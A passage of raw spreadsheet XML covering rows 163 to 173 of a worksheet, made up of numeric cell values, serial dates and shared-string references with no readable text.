      </c>
      <c r="R163">
        <v>0</v>
      </c>
      <c r="S163">
        <v>0</v>
      </c>
      <c r="T163">
        <v>0</v>
      </c>
      <c r="U163">
        <v>30000</v>
      </c>
      <c r="V163">
        <v>0</v>
      </c>
      <c r="W163">
        <v>0</v>
      </c>
      <c r="X163">
        <v>0</v>
      </c>
      <c r="Y163">
        <v>0</v>
      </c>
      <c r="Z163">
        <v>0</v>
      </c>
      <c r="AA163">
        <v>0</v>
      </c>
      <c r="AB163">
        <v>0</v>
      </c>
      <c r="AC163">
        <v>0</v>
      </c>
      <c r="AD163">
        <v>0</v>
      </c>
      <c r="AE163">
        <v>0</v>
      </c>
      <c r="AF163" t="s">
        <v>1439</v>
      </c>
      <c r="AG163">
        <v>50219</v>
      </c>
      <c r="AH163">
        <v>14</v>
      </c>
      <c r="AI163" t="s">
        <v>1440</v>
      </c>
      <c r="AJ163">
        <v>220</v>
      </c>
      <c r="AK163" t="s">
        <v>1441</v>
      </c>
      <c r="AL163" t="s">
        <v>1442</v>
      </c>
      <c r="AM163" t="s">
        <v>1443</v>
      </c>
      <c r="AN163" t="s">
        <v>55</v>
      </c>
      <c r="AO163">
        <v>2015</v>
      </c>
      <c r="AP163">
        <v>2476431792</v>
      </c>
      <c r="AQ163" t="s">
        <v>1444</v>
      </c>
      <c r="AR163" t="s">
        <v>1439</v>
      </c>
      <c r="AU163">
        <v>26</v>
      </c>
      <c r="AV163">
        <v>0</v>
      </c>
      <c r="AW163">
        <v>0</v>
      </c>
      <c r="AX163">
        <v>0</v>
      </c>
      <c r="AY163">
        <v>8</v>
      </c>
      <c r="AZ163">
        <v>2</v>
      </c>
      <c r="BA163" t="s">
        <v>16676</v>
      </c>
      <c r="BB163" t="s">
        <v>14517</v>
      </c>
      <c r="BC163">
        <v>0</v>
      </c>
      <c r="BD163" t="s">
        <v>10634</v>
      </c>
    </row>
    <row r="164" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A164">
        <v>439</v>
      </c>
      <c r="B164" t="s">
        <v>1445</v>
      </c>
      <c r="C164" t="s">
        <v>88</v>
      </c>
      <c r="D164" t="s">
        <v>1446</v>
      </c>
      <c r="E164" t="s">
        <v>111</v>
      </c>
      <c r="F164" t="s">
        <v>1447</v>
      </c>
      <c r="G164" s="1">
        <v>44137</v>
      </c>
      <c r="H164">
        <v>4069</v>
      </c>
      <c r="I164">
        <v>4069</v>
      </c>
      <c r="J164">
        <v>1</v>
      </c>
      <c r="K164">
        <v>1</v>
      </c>
      <c r="L164">
        <v>1</v>
      </c>
      <c r="M164">
        <v>0</v>
      </c>
      <c r="N164">
        <v>0</v>
      </c>
      <c r="O164">
        <v>0</v>
      </c>
      <c r="P164">
        <v>0</v>
      </c>
      <c r="Q164">
        <v>0</v>
      </c>
      <c r="R164">
        <v>1</v>
      </c>
      <c r="S164">
        <v>0</v>
      </c>
      <c r="T164">
        <v>0</v>
      </c>
      <c r="U164">
        <v>200000</v>
      </c>
      <c r="V164">
        <v>20000</v>
      </c>
      <c r="W164">
        <v>10000</v>
      </c>
      <c r="X164">
        <v>0</v>
      </c>
      <c r="Y164">
        <v>0</v>
      </c>
      <c r="Z164">
        <v>0</v>
      </c>
      <c r="AA164">
        <v>0</v>
      </c>
      <c r="AB164">
        <v>0</v>
      </c>
      <c r="AC164">
        <v>1000</v>
      </c>
      <c r="AD164">
        <v>0</v>
      </c>
      <c r="AE164">
        <v>0</v>
      </c>
      <c r="AF164" t="s">
        <v>1448</v>
      </c>
      <c r="AG164">
        <v>80223</v>
      </c>
      <c r="AH164">
        <v>17</v>
      </c>
      <c r="AJ164">
        <v>282</v>
      </c>
      <c r="AK164" t="s">
        <v>592</v>
      </c>
      <c r="AL164" t="s">
        <v>593</v>
      </c>
      <c r="AM164" t="s">
        <v>1449</v>
      </c>
      <c r="AN164" t="s">
        <v>55</v>
      </c>
      <c r="AO164">
        <v>1999</v>
      </c>
      <c r="AP164" t="s">
        <v>1450</v>
      </c>
      <c r="AQ164" t="s">
        <v>1451</v>
      </c>
      <c r="AR164" t="s">
        <v>1452</v>
      </c>
      <c r="AS164" t="s">
        <v>71</v>
      </c>
      <c r="AT164" t="s">
        <v>58</v>
      </c>
      <c r="AU164">
        <v>26</v>
      </c>
      <c r="AV164">
        <v>1</v>
      </c>
      <c r="AW164">
        <v>0</v>
      </c>
      <c r="AX164">
        <v>0</v>
      </c>
      <c r="AY164">
        <v>18</v>
      </c>
      <c r="AZ164">
        <v>29</v>
      </c>
      <c r="BA164" t="s">
        <v>16690</v>
      </c>
      <c r="BB164" t="s">
        <v>14574</v>
      </c>
      <c r="BC164" t="s">
        <v>9746</v>
      </c>
      <c r="BD164" t="s">
        <v>12223</v>
      </c>
    </row>
    <row r="165" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A165">
        <v>624</v>
      </c>
      <c r="B165" t="s">
        <v>1453</v>
      </c>
      <c r="C165" t="s">
        <v>88</v>
      </c>
      <c r="D165" t="s">
        <v>1454</v>
      </c>
      <c r="E165" t="s">
        <v>131</v>
      </c>
      <c r="F165" t="s">
        <v>1455</v>
      </c>
      <c r="G165" s="1">
        <v>44034</v>
      </c>
      <c r="H165">
        <v>4075</v>
      </c>
      <c r="I165">
        <v>4075</v>
      </c>
      <c r="J165">
        <v>0</v>
      </c>
      <c r="K165">
        <v>0</v>
      </c>
      <c r="L165">
        <v>0</v>
      </c>
      <c r="M165">
        <v>0</v>
      </c>
      <c r="N165">
        <v>0</v>
      </c>
      <c r="O165">
        <v>0</v>
      </c>
      <c r="P165">
        <v>0</v>
      </c>
      <c r="Q165">
        <v>0</v>
      </c>
      <c r="R165">
        <v>1</v>
      </c>
      <c r="S165">
        <v>1</v>
      </c>
      <c r="T165">
        <v>1</v>
      </c>
      <c r="U165">
        <v>0</v>
      </c>
      <c r="V165">
        <v>0</v>
      </c>
      <c r="W165">
        <v>0</v>
      </c>
      <c r="X165">
        <v>0</v>
      </c>
      <c r="Y165">
        <v>0</v>
      </c>
      <c r="Z165">
        <v>0</v>
      </c>
      <c r="AA165">
        <v>0</v>
      </c>
      <c r="AB165">
        <v>0</v>
      </c>
      <c r="AC165">
        <v>10000</v>
      </c>
      <c r="AD165">
        <v>1</v>
      </c>
      <c r="AE165">
        <v>100000</v>
      </c>
      <c r="AF165" t="s">
        <v>1456</v>
      </c>
      <c r="AG165">
        <v>82251</v>
      </c>
      <c r="AH165">
        <v>17</v>
      </c>
      <c r="AJ165">
        <v>274</v>
      </c>
      <c r="AK165" t="s">
        <v>1058</v>
      </c>
      <c r="AL165" t="s">
        <v>1457</v>
      </c>
      <c r="AM165" t="s">
        <v>1458</v>
      </c>
      <c r="AN165" t="s">
        <v>68</v>
      </c>
      <c r="AO165">
        <v>2005</v>
      </c>
      <c r="AP165" t="s">
        <v>1459</v>
      </c>
      <c r="AQ165" t="s">
        <v>1460</v>
      </c>
      <c r="AR165" t="s">
        <v>1456</v>
      </c>
      <c r="AU165">
        <v>0</v>
      </c>
      <c r="AV165">
        <v>0</v>
      </c>
      <c r="AW165">
        <v>10</v>
      </c>
      <c r="AX165">
        <v>0</v>
      </c>
      <c r="AY165">
        <v>2</v>
      </c>
      <c r="AZ165">
        <v>1</v>
      </c>
      <c r="BA165" t="s">
        <v>17413</v>
      </c>
      <c r="BB165" t="s">
        <v>14728</v>
      </c>
      <c r="BC165">
        <v>0</v>
      </c>
      <c r="BD165" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="166" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A166">
        <v>738</v>
      </c>
      <c r="B166" t="s">
        <v>1461</v>
      </c>
      <c r="C166" t="s">
        <v>88</v>
      </c>
      <c r="D166" t="s">
        <v>1462</v>
      </c>
      <c r="E166" t="s">
        <v>142</v>
      </c>
      <c r="F166" t="s">
        <v>1463</v>
      </c>
      <c r="G166" s="1">
        <v>44081</v>
      </c>
      <c r="H166">
        <v>4090</v>
      </c>
      <c r="I166">
        <v>4090</v>
      </c>
      <c r="J166">
        <v>1</v>
      </c>
      <c r="K166">
        <v>0</v>
      </c>
      <c r="L166">
        <v>1</v>
      </c>
      <c r="M166">
        <v>0</v>
      </c>
      <c r="N166">
        <v>0</v>
      </c>
      <c r="O166">
        <v>0</v>
      </c>
      <c r="P166">
        <v>0</v>
      </c>
      <c r="Q166">
        <v>10</v>
      </c>
      <c r="R166">
        <v>0</v>
      </c>
      <c r="S166">
        <v>0</v>
      </c>
      <c r="T166">
        <v>1</v>
      </c>
      <c r="U166">
        <v>75000</v>
      </c>
      <c r="V166">
        <v>0</v>
      </c>
      <c r="W166">
        <v>20000</v>
      </c>
      <c r="X166">
        <v>0</v>
      </c>
      <c r="Y166">
        <v>0</v>
      </c>
      <c r="Z166">
        <v>0</v>
      </c>
      <c r="AA166">
        <v>0</v>
      </c>
      <c r="AB166">
        <v>1000</v>
      </c>
      <c r="AC166">
        <v>0</v>
      </c>
      <c r="AD166">
        <v>0</v>
      </c>
      <c r="AE166">
        <v>10000</v>
      </c>
      <c r="AF166" t="s">
        <v>692</v>
      </c>
      <c r="AG166">
        <v>80222</v>
      </c>
      <c r="AH166">
        <v>17</v>
      </c>
      <c r="AJ166">
        <v>282</v>
      </c>
      <c r="AK166" t="s">
        <v>592</v>
      </c>
      <c r="AL166" t="s">
        <v>593</v>
      </c>
      <c r="AM166" t="s">
        <v>1464</v>
      </c>
      <c r="AN166" t="s">
        <v>55</v>
      </c>
      <c r="AO166">
        <v>2008</v>
      </c>
      <c r="AP166" t="s">
        <v>1465</v>
      </c>
      <c r="AQ166" t="s">
        <v>1466</v>
      </c>
      <c r="AR166" t="s">
        <v>692</v>
      </c>
      <c r="AS166" t="s">
        <v>71</v>
      </c>
      <c r="AT166" t="s">
        <v>58</v>
      </c>
      <c r="AU166">
        <v>8</v>
      </c>
      <c r="AV166">
        <v>1</v>
      </c>
      <c r="AW166">
        <v>0</v>
      </c>
      <c r="AX166">
        <v>0</v>
      </c>
      <c r="AY166">
        <v>31</v>
      </c>
      <c r="AZ166">
        <v>8</v>
      </c>
      <c r="BA166" t="s">
        <v>17386</v>
      </c>
      <c r="BB166" t="s">
        <v>14815</v>
      </c>
      <c r="BC166" t="s">
        <v>11784</v>
      </c>
      <c r="BD166" t="s">
        <v>11785</v>
      </c>
    </row>
    <row r="167" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A167">
        <v>297</v>
      </c>
      <c r="B167" t="s">
        <v>1467</v>
      </c>
      <c r="C167" t="s">
        <v>790</v>
      </c>
      <c r="D167" t="s">
        <v>1468</v>
      </c>
      <c r="E167" t="s">
        <v>142</v>
      </c>
      <c r="F167" t="s">
        <v>1469</v>
      </c>
      <c r="G167" s="1">
        <v>44071</v>
      </c>
      <c r="H167">
        <v>4111</v>
      </c>
      <c r="I167">
        <v>4111</v>
      </c>
      <c r="J167">
        <v>0</v>
      </c>
      <c r="K167">
        <v>2</v>
      </c>
      <c r="L167">
        <v>4</v>
      </c>
      <c r="M167">
        <v>0</v>
      </c>
      <c r="N167">
        <v>0</v>
      </c>
      <c r="O167">
        <v>0</v>
      </c>
      <c r="P167">
        <v>0</v>
      </c>
      <c r="Q167">
        <v>0</v>
      </c>
      <c r="R167">
        <v>5</v>
      </c>
      <c r="S167">
        <v>1</v>
      </c>
      <c r="T167">
        <v>0</v>
      </c>
      <c r="U167">
        <v>0</v>
      </c>
      <c r="V167">
        <v>2</v>
      </c>
      <c r="W167">
        <v>12000</v>
      </c>
      <c r="X167">
        <v>0</v>
      </c>
      <c r="Y167">
        <v>0</v>
      </c>
      <c r="Z167">
        <v>0</v>
      </c>
      <c r="AA167">
        <v>0</v>
      </c>
      <c r="AB167">
        <v>0</v>
      </c>
      <c r="AC167">
        <v>500</v>
      </c>
      <c r="AD167">
        <v>1</v>
      </c>
      <c r="AE167">
        <v>0</v>
      </c>
      <c r="AF167" t="s">
        <v>1470</v>
      </c>
      <c r="AG167">
        <v>93234</v>
      </c>
      <c r="AH167">
        <v>27</v>
      </c>
      <c r="AJ167">
        <v>438</v>
      </c>
      <c r="AK167" t="s">
        <v>793</v>
      </c>
      <c r="AL167" t="s">
        <v>794</v>
      </c>
      <c r="AM167" t="s">
        <v>1471</v>
      </c>
      <c r="AN167" t="s">
        <v>68</v>
      </c>
      <c r="AO167">
        <v>2008</v>
      </c>
      <c r="AP167" t="s">
        <v>1472</v>
      </c>
      <c r="AQ167" t="s">
        <v>1473</v>
      </c>
      <c r="AR167" t="s">
        <v>1474</v>
      </c>
      <c r="AS167" t="s">
        <v>71</v>
      </c>
      <c r="AT167" t="s">
        <v>72</v>
      </c>
      <c r="AU167">
        <v>26</v>
      </c>
      <c r="AV167">
        <v>0</v>
      </c>
      <c r="AW167">
        <v>25</v>
      </c>
      <c r="AX167">
        <v>26</v>
      </c>
      <c r="AY167">
        <v>7</v>
      </c>
      <c r="AZ167">
        <v>4</v>
      </c>
      <c r="BA167" t="s">
        <v>16644</v>
      </c>
      <c r="BB167" t="s">
        <v>14463</v>
      </c>
      <c r="BC167" t="s">
        <v>10409</v>
      </c>
      <c r="BD167" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="168" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A168">
        <v>664</v>
      </c>
      <c r="B168" t="s">
        <v>1475</v>
      </c>
      <c r="C168" t="s">
        <v>168</v>
      </c>
      <c r="D168" t="s">
        <v>1476</v>
      </c>
      <c r="E168" t="s">
        <v>1161</v>
      </c>
      <c r="F168" t="s">
        <v>1477</v>
      </c>
      <c r="G168" s="1">
        <v>44116</v>
      </c>
      <c r="H168">
        <v>4117</v>
      </c>
      <c r="I168">
        <v>4117</v>
      </c>
      <c r="J168">
        <v>1</v>
      </c>
      <c r="K168">
        <v>1</v>
      </c>
      <c r="L168">
        <v>0</v>
      </c>
      <c r="M168">
        <v>0</v>
      </c>
      <c r="N168">
        <v>0</v>
      </c>
      <c r="O168">
        <v>0</v>
      </c>
      <c r="P168">
        <v>0</v>
      </c>
      <c r="Q168">
        <v>0</v>
      </c>
      <c r="R168">
        <v>0</v>
      </c>
      <c r="S168">
        <v>1</v>
      </c>
      <c r="T168">
        <v>1</v>
      </c>
      <c r="U168">
        <v>40000</v>
      </c>
      <c r="V168">
        <v>1</v>
      </c>
      <c r="W168">
        <v>0</v>
      </c>
      <c r="X168">
        <v>0</v>
      </c>
      <c r="Y168">
        <v>0</v>
      </c>
      <c r="Z168">
        <v>0</v>
      </c>
      <c r="AA168">
        <v>0</v>
      </c>
      <c r="AB168">
        <v>0</v>
      </c>
      <c r="AC168">
        <v>0</v>
      </c>
      <c r="AD168">
        <v>1</v>
      </c>
      <c r="AE168">
        <v>50000</v>
      </c>
      <c r="AF168" t="s">
        <v>1478</v>
      </c>
      <c r="AG168">
        <v>16810</v>
      </c>
      <c r="AH168">
        <v>13</v>
      </c>
      <c r="AJ168">
        <v>161</v>
      </c>
      <c r="AK168" t="s">
        <v>1479</v>
      </c>
      <c r="AL168" t="s">
        <v>1480</v>
      </c>
      <c r="AM168" t="s">
        <v>1481</v>
      </c>
      <c r="AN168" t="s">
        <v>55</v>
      </c>
      <c r="AO168">
        <v>2017</v>
      </c>
      <c r="AP168" t="s">
        <v>1482</v>
      </c>
      <c r="AQ168" t="s">
        <v>1483</v>
      </c>
      <c r="AR168" t="s">
        <v>1484</v>
      </c>
      <c r="AS168" t="s">
        <v>179</v>
      </c>
      <c r="AT168" t="s">
        <v>58</v>
      </c>
      <c r="AU168">
        <v>6</v>
      </c>
      <c r="AV168">
        <v>0</v>
      </c>
      <c r="AW168">
        <v>0</v>
      </c>
      <c r="AX168">
        <v>0</v>
      </c>
      <c r="AY168">
        <v>32</v>
      </c>
      <c r="AZ168">
        <v>0</v>
      </c>
      <c r="BA168" t="s">
        <v>16632</v>
      </c>
      <c r="BB168" t="s">
        <v>14367</v>
      </c>
      <c r="BC168" t="s">
        <v>10287</v>
      </c>
      <c r="BD168">
        <v>0</v>
      </c>
    </row>
    <row r="169" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A169">
        <v>210</v>
      </c>
      <c r="B169" t="s">
        <v>1485</v>
      </c>
      <c r="C169" t="s">
        <v>168</v>
      </c>
      <c r="D169" t="s">
        <v>1486</v>
      </c>
      <c r="E169" t="s">
        <v>142</v>
      </c>
      <c r="F169" t="s">
        <v>1487</v>
      </c>
      <c r="G169" s="1">
        <v>44370</v>
      </c>
      <c r="H169">
        <v>4133</v>
      </c>
      <c r="I169">
        <v>4133</v>
      </c>
      <c r="J169">
        <v>0</v>
      </c>
      <c r="K169">
        <v>3</v>
      </c>
      <c r="L169">
        <v>0</v>
      </c>
      <c r="M169">
        <v>0</v>
      </c>
      <c r="N169">
        <v>0</v>
      </c>
      <c r="O169">
        <v>0</v>
      </c>
      <c r="P169">
        <v>0</v>
      </c>
      <c r="Q169">
        <v>0</v>
      </c>
      <c r="R169">
        <v>0</v>
      </c>
      <c r="S169">
        <v>0</v>
      </c>
      <c r="T169">
        <v>0</v>
      </c>
      <c r="U169">
        <v>0</v>
      </c>
      <c r="V169">
        <v>3</v>
      </c>
      <c r="W169">
        <v>0</v>
      </c>
      <c r="X169">
        <v>0</v>
      </c>
      <c r="Y169">
        <v>0</v>
      </c>
      <c r="Z169">
        <v>0</v>
      </c>
      <c r="AA169">
        <v>0</v>
      </c>
      <c r="AB169">
        <v>0</v>
      </c>
      <c r="AC169">
        <v>0</v>
      </c>
      <c r="AD169">
        <v>0</v>
      </c>
      <c r="AE169">
        <v>0</v>
      </c>
      <c r="AF169" t="s">
        <v>1488</v>
      </c>
      <c r="AG169">
        <v>17550</v>
      </c>
      <c r="AH169">
        <v>13</v>
      </c>
      <c r="AJ169">
        <v>176</v>
      </c>
      <c r="AK169" t="s">
        <v>1180</v>
      </c>
      <c r="AL169" t="s">
        <v>1489</v>
      </c>
      <c r="AM169" t="s">
        <v>1490</v>
      </c>
      <c r="AN169" t="s">
        <v>55</v>
      </c>
      <c r="AO169">
        <v>2016</v>
      </c>
      <c r="AP169">
        <v>2122104959</v>
      </c>
      <c r="AQ169" t="s">
        <v>1491</v>
      </c>
      <c r="AR169" t="s">
        <v>1492</v>
      </c>
      <c r="AS169" t="s">
        <v>71</v>
      </c>
      <c r="AT169" t="s">
        <v>58</v>
      </c>
      <c r="AU169">
        <v>26</v>
      </c>
      <c r="AV169">
        <v>2</v>
      </c>
      <c r="AW169">
        <v>58</v>
      </c>
      <c r="AX169">
        <v>6</v>
      </c>
      <c r="AY169">
        <v>14</v>
      </c>
      <c r="AZ169">
        <v>4</v>
      </c>
      <c r="BA169" t="s">
        <v>16641</v>
      </c>
      <c r="BB169" t="s">
        <v>14387</v>
      </c>
      <c r="BC169" t="s">
        <v>11131</v>
      </c>
      <c r="BD169" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="170" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A170">
        <v>384</v>
      </c>
      <c r="B170" t="s">
        <v>1493</v>
      </c>
      <c r="C170" t="s">
        <v>157</v>
      </c>
      <c r="D170" t="s">
        <v>1494</v>
      </c>
      <c r="E170" t="s">
        <v>142</v>
      </c>
      <c r="F170" t="s">
        <v>1495</v>
      </c>
      <c r="G170" s="1">
        <v>44124</v>
      </c>
      <c r="H170">
        <v>4137</v>
      </c>
      <c r="I170">
        <v>4137</v>
      </c>
      <c r="J170">
        <v>1</v>
      </c>
      <c r="K170">
        <v>0</v>
      </c>
      <c r="L170">
        <v>0</v>
      </c>
      <c r="M170">
        <v>3</v>
      </c>
      <c r="N170">
        <v>0</v>
      </c>
      <c r="O170">
        <v>0</v>
      </c>
      <c r="P170">
        <v>0</v>
      </c>
      <c r="Q170">
        <v>2</v>
      </c>
      <c r="R170">
        <v>15</v>
      </c>
      <c r="S170">
        <v>0</v>
      </c>
      <c r="T170">
        <v>1</v>
      </c>
      <c r="U170">
        <v>500</v>
      </c>
      <c r="V170">
        <v>0</v>
      </c>
      <c r="W170">
        <v>0</v>
      </c>
      <c r="X170">
        <v>4800</v>
      </c>
      <c r="Y170">
        <v>0</v>
      </c>
      <c r="Z170">
        <v>0</v>
      </c>
      <c r="AA170">
        <v>0</v>
      </c>
      <c r="AB170">
        <v>1000</v>
      </c>
      <c r="AC170">
        <v>25000</v>
      </c>
      <c r="AD170">
        <v>0</v>
      </c>
      <c r="AE170">
        <v>50000</v>
      </c>
      <c r="AF170" t="s">
        <v>1496</v>
      </c>
      <c r="AG170">
        <v>67221</v>
      </c>
      <c r="AH170">
        <v>16</v>
      </c>
      <c r="AJ170">
        <v>260</v>
      </c>
      <c r="AK170" t="s">
        <v>1497</v>
      </c>
      <c r="AL170" t="s">
        <v>1498</v>
      </c>
      <c r="AM170" t="s">
        <v>1499</v>
      </c>
      <c r="AN170" t="s">
        <v>82</v>
      </c>
      <c r="AO170">
        <v>1996</v>
      </c>
      <c r="AP170" t="s">
        <v>1500</v>
      </c>
      <c r="AQ170" t="s">
        <v>1501</v>
      </c>
      <c r="AR170" t="s">
        <v>1502</v>
      </c>
      <c r="AS170" t="s">
        <v>71</v>
      </c>
      <c r="AT170" t="s">
        <v>86</v>
      </c>
      <c r="AU170">
        <v>142</v>
      </c>
      <c r="AV170">
        <v>272</v>
      </c>
      <c r="AW170">
        <v>40</v>
      </c>
      <c r="AX170">
        <v>17</v>
      </c>
      <c r="AY170">
        <v>46</v>
      </c>
      <c r="AZ170">
        <v>9</v>
      </c>
      <c r="BA170" t="s">
        <v>16680</v>
      </c>
      <c r="BB170" t="s">
        <v>14532</v>
      </c>
      <c r="BC170" t="s">
        <v>11840</v>
      </c>
      <c r="BD170" t="s">
        <v>11841</v>
      </c>
    </row>
    <row r="171" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A171">
        <v>604</v>
      </c>
      <c r="B171" t="s">
        <v>1503</v>
      </c>
      <c r="C171" t="s">
        <v>790</v>
      </c>
      <c r="D171" t="s">
        <v>1504</v>
      </c>
      <c r="E171" t="s">
        <v>142</v>
      </c>
      <c r="F171" t="s">
        <v>1505</v>
      </c>
      <c r="G171" s="1">
        <v>44005</v>
      </c>
      <c r="H171">
        <v>4144</v>
      </c>
      <c r="I171">
        <v>4144</v>
      </c>
      <c r="J171">
        <v>4</v>
      </c>
      <c r="K171">
        <v>0</v>
      </c>
      <c r="L171">
        <v>2</v>
      </c>
      <c r="M171">
        <v>2</v>
      </c>
      <c r="N171">
        <v>0</v>
      </c>
      <c r="O171">
        <v>2</v>
      </c>
      <c r="P171">
        <v>0</v>
      </c>
      <c r="Q171">
        <v>15</v>
      </c>
      <c r="R171">
        <v>40</v>
      </c>
      <c r="S171">
        <v>1</v>
      </c>
      <c r="T171">
        <v>1</v>
      </c>
      <c r="U171">
        <v>500000</v>
      </c>
      <c r="V171">
        <v>0</v>
      </c>
      <c r="W171">
        <v>5000</v>
      </c>
      <c r="X171">
        <v>2000</v>
      </c>
      <c r="Y171">
        <v>0</v>
      </c>
      <c r="Z171">
        <v>2</v>
      </c>
      <c r="AA171">
        <v>0</v>
      </c>
      <c r="AB171">
        <v>10000</v>
      </c>
      <c r="AC171">
        <v>30000</v>
      </c>
      <c r="AD171">
        <v>1</v>
      </c>
      <c r="AE171">
        <v>35000</v>
      </c>
      <c r="AF171" t="s">
        <v>1506</v>
      </c>
      <c r="AG171">
        <v>93232</v>
      </c>
      <c r="AH171">
        <v>27</v>
      </c>
      <c r="AJ171">
        <v>438</v>
      </c>
      <c r="AK171" t="s">
        <v>793</v>
      </c>
      <c r="AL171" t="s">
        <v>794</v>
      </c>
      <c r="AM171" t="s">
        <v>1507</v>
      </c>
      <c r="AN171" t="s">
        <v>82</v>
      </c>
      <c r="AO171">
        <v>1990</v>
      </c>
      <c r="AP171" t="s">
        <v>1508</v>
      </c>
      <c r="AQ171" t="s">
        <v>1509</v>
      </c>
      <c r="AR171" t="s">
        <v>1510</v>
      </c>
      <c r="AS171" t="s">
        <v>71</v>
      </c>
      <c r="AT171" t="s">
        <v>86</v>
      </c>
      <c r="AU171">
        <v>6</v>
      </c>
      <c r="AV171">
        <v>0</v>
      </c>
      <c r="AW171">
        <v>40</v>
      </c>
      <c r="AX171">
        <v>198</v>
      </c>
      <c r="AY171">
        <v>26</v>
      </c>
      <c r="AZ171">
        <v>25</v>
      </c>
      <c r="BA171" t="s">
        <v>16723</v>
      </c>
      <c r="BB171" t="s">
        <v>14712</v>
      </c>
      <c r="BC171" t="s">
        <v>10003</v>
      </c>
      <c r="BD171" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="172" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A172">
        <v>711</v>
      </c>
      <c r="B172" t="s">
        <v>1511</v>
      </c>
      <c r="C172" t="s">
        <v>579</v>
      </c>
      <c r="D172" t="s">
        <v>1512</v>
      </c>
      <c r="E172" t="s">
        <v>49</v>
      </c>
      <c r="F172" t="s">
        <v>1513</v>
      </c>
      <c r="G172" s="1">
        <v>44068</v>
      </c>
      <c r="H172">
        <v>4153</v>
      </c>
      <c r="I172">
        <v>4153</v>
      </c>
      <c r="J172">
        <v>0</v>
      </c>
      <c r="K172">
        <v>0</v>
      </c>
      <c r="L172">
        <v>0</v>
      </c>
      <c r="M172">
        <v>0</v>
      </c>
      <c r="N172">
        <v>0</v>
      </c>
      <c r="O172">
        <v>0</v>
      </c>
      <c r="P172">
        <v>0</v>
      </c>
      <c r="Q172">
        <v>4</v>
      </c>
      <c r="R172">
        <v>0</v>
      </c>
      <c r="S172">
        <v>1</v>
      </c>
      <c r="T172">
        <v>1</v>
      </c>
      <c r="U172">
        <v>0</v>
      </c>
      <c r="V172">
        <v>0</v>
      </c>
      <c r="W172">
        <v>0</v>
      </c>
      <c r="X172">
        <v>0</v>
      </c>
      <c r="Y172">
        <v>0</v>
      </c>
      <c r="Z172">
        <v>0</v>
      </c>
      <c r="AA172">
        <v>0</v>
      </c>
      <c r="AB172">
        <v>15</v>
      </c>
      <c r="AC172">
        <v>0</v>
      </c>
      <c r="AD172">
        <v>1</v>
      </c>
      <c r="AE172">
        <v>500</v>
      </c>
      <c r="AF172" t="s">
        <v>1514</v>
      </c>
      <c r="AG172">
        <v>75326</v>
      </c>
      <c r="AH172">
        <v>23</v>
      </c>
      <c r="AJ172">
        <v>365</v>
      </c>
      <c r="AK172" t="s">
        <v>1515</v>
      </c>
      <c r="AL172" t="s">
        <v>1516</v>
      </c>
      <c r="AM172" t="s">
        <v>1517</v>
      </c>
      <c r="AN172" t="s">
        <v>68</v>
      </c>
      <c r="AO172">
        <v>2010</v>
      </c>
      <c r="AP172">
        <v>81346426683</v>
      </c>
      <c r="AQ172" t="s">
        <v>1518</v>
      </c>
      <c r="AR172" t="s">
        <v>1514</v>
      </c>
      <c r="AS172" t="s">
        <v>71</v>
      </c>
      <c r="AT172" t="s">
        <v>72</v>
      </c>
      <c r="AU172">
        <v>15</v>
      </c>
      <c r="AV172">
        <v>1</v>
      </c>
      <c r="AW172">
        <v>1</v>
      </c>
      <c r="AX172">
        <v>10</v>
      </c>
      <c r="AY172">
        <v>0</v>
      </c>
      <c r="AZ172">
        <v>2</v>
      </c>
      <c r="BA172" t="s">
        <v>17393</v>
      </c>
      <c r="BB172" t="s">
        <v>14794</v>
      </c>
      <c r="BC172" t="s">
        <v>11129</v>
      </c>
      <c r="BD172">
        <v>0</v>
      </c>
    </row>
    <row r="173" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A173">
        <v>475</v>
      </c>
      <c r="B173" t="s">
        <v>1519</v>
      </c>
      <c r="C173" t="s">
        <v>157</v>
      </c>
      <c r="D173" t="s">
        <v>1520</v>
      </c>
      <c r="E173" t="s">
        <v>944</v>
      </c>
      <c r="F173" t="s">
        <v>1521</v>
      </c>
      <c r="G173" s="1">
        <v>44039</v>
      </c>
      <c r="H173">
        <v>4169</v>
      </c>
      <c r="I173">
        <v>4169</v>
      </c>
      <c r="J173">
        <v>4</v>
      </c>
      <c r="K173">
        <v>0</v>
      </c>
      <c r="L173">
        <v>2</v>
      </c>
      <c r="M173">
        <v>0</v>
      </c>
      <c r="N173">
        <v>0</v>
      </c>
      <c r="O173">
        <v>0</v>
      </c>
      <c r="P173">
        <v>17</v>
      </c>
      <c r="Q173">
        <v>2</v>
      </c>
      <c r="R173">
        <v>11</v>
      </c>
      <c r="S173">
        <v>23</v>
      </c>
      <c r="T173">
        <v>2</v>
      </c>
      <c r="U173">
        <v>1330</v>
      </c>
      <c r="V173">
        <v>0</v>
      </c>
      <c r="W173">
        <v>2500</v>
      </c>
      <c r="X173">
        <v>0</v>
      </c>
      <c r="Y173">
        <v>0</v>
      </c>
      <c r="Z173">
        <v>0</v>
      </c>
      <c r="AA173">
        <v>2000</v>
      </c>
      <c r="AB173">
        <v>100</v>
      </c>
      <c r="AC173">
        <v>1000</v>
      </c>
      <c r="AD173">
        <v>1200</v>
      </c>
      <c r="AE173">
        <v>650000</v>
      </c>
      <c r="AF173" t="s">
        <v>1522</v>
      </c>
      <c r="AG173">
        <v>68472</v>
      </c>
      <c r="AH173">
        <v>16</v>
      </c>
      <c r="AJ173">
        <v>237</v>
      </c>
      <c r="AK173" t="s">
        <v>377</v>
      </c>
      <c r="AL173" t="s">
        <v>378</v>
      </c>
      <c r="AM173" t="s">
        <v>1523</v>
      </c>
      <c r="AN173" t="s">
        <v>55</v>
      </c>
      <c r="AO173">
        <v>2005</v>
      </c>
      <c r="AP173" t="s">
        <v>1524</v>
      </c>
      <c r="AQ173" t="s">
        <v>1525</v>
      </c>
      <c r="AR173" t="s">
        <v>1526</v>
      </c>
      <c r="AS173" t="s">
        <v>371</v>
      </c>
      <c r="AT173" t="s">
        <v>72</v>
      </c>
      <c r="AU173">
        <v>6</v>
      </c>
